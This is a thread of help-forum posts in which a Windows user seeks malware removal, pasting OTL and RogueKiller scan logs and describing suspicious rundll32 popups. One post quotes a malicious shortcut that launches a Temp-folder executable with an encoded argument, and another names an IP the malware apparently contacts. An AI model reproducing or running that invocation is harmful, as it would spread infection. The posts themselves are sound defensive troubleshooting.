« on: January 23, 2015, 09:19:44 PM »
Sorry I have to break my post in 2-3 steps because of length.

Anyways here they are:

1. The OTL fix produced this report:

All processes killed
========== OTL ==========
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache AcceptLangs| /E : value set successfully!
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache_TIMESTAMP| /E : value set successfully!
File C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/ConduitChromeApiPlugin.dll not found.
File C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/np-cwmp.dll not found.
========== FILES ==========
File\Folder C:\Users\Tom Jones\AppData\Roaming\Windaws.bat not found.
File\Folder C:\Users\Tom Jones\AppData\Roaming\*.vbs not found.
File\Folder C:\Users\*.vbs not found.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: All Users
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Public
 
User: Tom Jones
->Temp folder emptied: 1421 bytes
->Temporary Internet Files folder emptied: 451 bytes
->Java cache emptied: 0 bytes
->Google Chrome cache emptied: 52902668 bytes
->Apple Safari cache emptied: 0 bytes
->Flash cache emptied: 0 bytes
 
User: Tom%20Jones
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 3066 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 0 bytes
%systemroot%\sysnative\config\systemprofile\AppData\LocalLow\Sun\Java\Deployment folder emptied: 0 bytes
RecycleBin emptied: 0 bytes
 
Total Files Cleaned = 50.00 mb
 
 
OTL by OldTimer - Version 3.2.69.0 log created on 01232015_124516

Files\Folders moved on Reboot...
C:\Users\Tom Jones\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...

--------------------------------------------------------------------------------------------------------



2. New OTL scan produced:

OTL logfile created on: 1/23/2015 1:10:34 PM - Run 2
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Tom Jones\Downloads
64bit- Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17501)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
15.97 Gb Total Physical Memory | 12.64 Gb Available Physical Memory | 79.17% Memory free
31.93 Gb Paging File | 27.89 Gb Available in Paging File | 87.33% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 111.69 Gb Total Space | 25.72 Gb Free Space | 23.03% Space Free | Partition Type: NTFS
Drive E: | 1397.26 Gb Total Space | 1099.73 Gb Free Space | 78.71% Space Free | Partition Type: NTFS
 
Computer Name: SSPC | User Name: Tom Jones | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2015/01/23 12:34:23 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Tom Jones\Downloads\OTL.exe
PRC - [2014/12/03 01:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014/05/19 05:46:34 | 000,465,064 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe
PRC - [2013/10/23 17:39:14 | 001,017,224 | ---- | M] (Flux Software LLC) -- C:\Users\Tom Jones\AppData\Local\FluxSoftware\Flux\flux.exe
PRC - [2013/07/19 16:28:58 | 000,557,968 | ---- | M] (Cisco Systems, Inc.) -- C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe
PRC - [2012/11/18 12:10:22 | 001,634,304 | ---- | M] (Don HO don.h@free.fr) -- E:\Program Files (x86)\Notepad++\notepad++.exe
PRC - [2010/12/02 09:15:14 | 000,915,584 | ---- | M] () -- C:\Program Files (x86)\ASUS\AAHM\1.00.14\aaHMSvc.exe
PRC - [2010/11/03 16:30:14 | 000,918,144 | ---- | M] () -- C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe
PRC - [2010/10/21 16:52:26 | 000,586,880 | ---- | M] () -- C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe
PRC - [2010/10/05 08:32:58 | 001,811,800 | ---- | M] (Logitech(c)) -- C:\Program Files (x86)\Logitech\G35\G35.exe
PRC - [2009/08/17 10:27:36 | 000,995,328 | ---- | M] (NETGEAR) -- C:\Program Files (x86)\NETGEAR\WPN111\WPN111.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2015/01/08 19:35:54 | 009,009,480 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\pdf.dll
MOD - [2015/01/08 19:35:51 | 001,077,064 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\libglesv2.dll
MOD - [2015/01/08 19:35:49 | 000,211,272 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\libegl.dll
MOD - [2015/01/08 19:35:48 | 001,677,128 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\ffmpegsumo.dll
MOD - [2014/05/19 05:46:34 | 000,465,064 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe
MOD - [2014/04/15 08:31:52 | 000,638,976 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\RTHAL.dll
MOD - [2014/04/15 08:31:28 | 000,216,064 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\RTCore.dll
MOD - [2014/04/15 08:31:20 | 000,127,488 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\RTUI.dll
MOD - [2014/04/15 08:31:16 | 000,071,680 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\RTMUI.dll
MOD - [2014/04/15 08:31:10 | 000,056,832 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\RTFC.dll
MOD - [2013/11/30 10:14:10 | 000,204,800 | ---- | M] () -- E:\Program Files (x86)\Notepad++\plugins\ComparePlugin.dll
MOD - [2011/09/21 15:46:28 | 001,673,728 | ---- | M] () -- E:\Program Files (x86)\Notepad++\plugins\NppFTP.dll
MOD - [2011/07/18 16:07:28 | 000,014,336 | ---- | M] () -- E:\Program Files (x86)\Notepad++\plugins\NppExport.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/11/21 21:35:29 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/08/22 14:14:34 | 000,368,624 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2014/08/22 14:14:34 | 000,023,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2013/10/04 23:58:24 | 000,087,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe -- (VsEtwService120)
SRV:64bit: - [2013/05/27 00:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2011/06/29 09:51:26 | 000,171,688 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Windows\SysNative\IPROSetMonitor.exe -- (Intel(R)
SRV:64bit: - [2010/02/02 18:03:05 | 000,015,768 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe -- (c2wts)
SRV:64bit: - [2009/07/13 20:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt)
SRV - [2014/12/19 18:38:02 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/12/11 10:30:48 | 000,315,496 | R--- | M] (Skype Technologies) [Auto | Stopped] -- E:\Program Files\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014/12/03 01:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/04/11 23:08:08 | 000,103,608 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2014/03/20 17:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/08/22 04:21:36 | 000,119,808 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe -- (Te.Service)
SRV - [2013/08/22 03:55:00 | 000,142,336 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Windows Kits\8.1\App Certification Kit\fussvc.exe -- (fussvc)
SRV - [2013/07/19 16:28:58 | 000,557,968 | ---- | M] (Cisco Systems, Inc.) [Auto | Running] -- C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe -- (vpnagent)
SRV - [2010/12/02 09:15:14 | 000,915,584 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\ASUS\AAHM\1.00.14\aaHMSvc.exe -- (asHmComSvc)
SRV - [2010/11/03 16:30:14 | 000,918,144 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe -- (asComSvc)
SRV - [2010/10/21 16:52:26 | 000,586,880 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe -- (AsSysCtrlService)
 

7
RogueKiller / Re: windows/SysWOW64/rundll32.exe halp me ?
« on: January 23, 2015, 02:10:22 AM »
Okay now this is probably bad.

Another shortcut to a .exe file appeared on my desktop under the fake name "VLC Media Player" which I obviously have never installed since I hate that player.
The shortcut's target is "C:\Users\Tom Jones\AppData\Local\Temp\bcdcabfdbbfi.exe" C:\Users\TOMJO~1\AppData\Local\Temp\bcdcabfdbbfi.exe 7-5-1-8-9-0-7-5-3-1-1 KEtIPDQxMjAyHy5MUEFIQEQ2Kx0uTT5PVkdJS0I/OjAfKD9IS0tJPTguNjcrGy47QEQ2Kx0uT0tKQ006VFhEQTwwMCswGCZTPk1TRFFYUFFENGhtb205LihuZGpt

I also scanned this with VirusTotal and these are the results: https://www.virustotal.com/en/file/f34683038e2d3a0cc4a74d91c199f00d3896b80aac04edbcef6191f3bd778b65/analysis/1421975128/

Someone gotta help me get rid of this stuff that apparently none of the tools I've used so far has detected anything...

8
RogueKiller / Re: windows/SysWOW64/rundll32.exe halp me ?
« on: January 23, 2015, 01:42:57 AM »
Hello again,

I have attached all 3 log files after scans, and also I've found a "FILE" under C:\Users named "Tom" and I've attached it.
It looks super suspicious I think. I scanned it with VirusTotal but it doesn't seem to find anything wrong with it, nonetheless the results are here: https://www.virustotal.com/en/file/60c32e7ba31fd30810d23222932a76129a7aa13347ece280c3a89f785c72d997/analysis/1421971881/
I proceeded to open it and it seems to be a text file with some code on it that I think is dead on some sort of malware trying to connect to some ip address that's not even mine: 69.162.120.131

NOTE: I changed the 'file' extension to .txt because the forum wouldn't let me upload a no-extension file.

Please advise.

Thank you!

9
RogueKiller / Re: windows/SysWOW64/rundll32.exe halp me ?
« on: January 22, 2015, 11:52:08 PM »
Hello again and thank you for the reply.

First off, yes it does look like the picture you provided, but I'm very confident that this is some sort of malware.
The reason being is that this has never happened before, and there are 5 instances of said window when I just boot up. This has never happened before, and the other clue that this is not some legit program is that under the "Program/File" name I see my first name and that just can't be right.

Please advise me to run some extensive scans with other tools if you can and guide me through it.
I'd appreciate it a lot.

Thank you again!

10
RogueKiller / windows/SysWOW64/rundll32.exe halp me ?
« on: January 22, 2015, 05:22:35 PM »
Hello, I need to do a series of thorough scans since for a few days in a row I kept getting 5 processes (rundll32.exe) that would pop up a "open file with" window right after I booted. I never clicked open and eventually found out that the rundll32.exe was in C:\Windows\SysWOW64 and I also did all scans with malwarebytes, roguekiller64, microsoft essentials and haven't found much. But I also found a registry key under Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce with a filename Adobe Speed Launcher which I don't quite like and its value is set to 1421941580. Anyway, any help with a series of scans would be appreciated.
-attached roguekiller report

RogueKiller V10.2.0.0 (x64) [Jan 19 2015] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Tom Jones [Administrator]
Mode : Scan -- Date : 01/22/2015  11:25:29

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 4 ¤¤¤
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1  -> Found
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1  -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 2 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1       localhost
[C:\Windows\System32\drivers\etc\hosts] ::1             localhost

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD1502FAEX-007BA0 ATA Device +++++
--- User ---
[MBR] 97ed83405a22741aa5222a22e681b176
[BSP] e5e13b1e52b32315f7fa08500dcdf184 : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 1430797 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: INTEL SS DSC2CW120A3 SCSI Disk Device +++++
--- User ---
[MBR] b7e0dc6f6c3f2ac7a7eca2b4ee48a17c
[BSP] 1f82269f5ba8a4c12ac33d16d54131fc : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114371 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
Error reading LL2 MBR! ([1] Incorrect function. )


============================================
RKreport_DEL_01212015_224147.log - RKreport_DEL_01212015_224200.log - RKreport_DEL_01212015_225447.log - RKreport_DEL_01212015_225932.log
RKreport_DEL_01222015_001748.log - RKreport_SCN_01212015_223814.log - RKreport_SCN_01212015_224326.log - RKreport_SCN_01212015_225859.log
RKreport_SCN_01212015_233829.log - RKreport_SCN_01222015_001707.log



Thank you!

Pages: [1]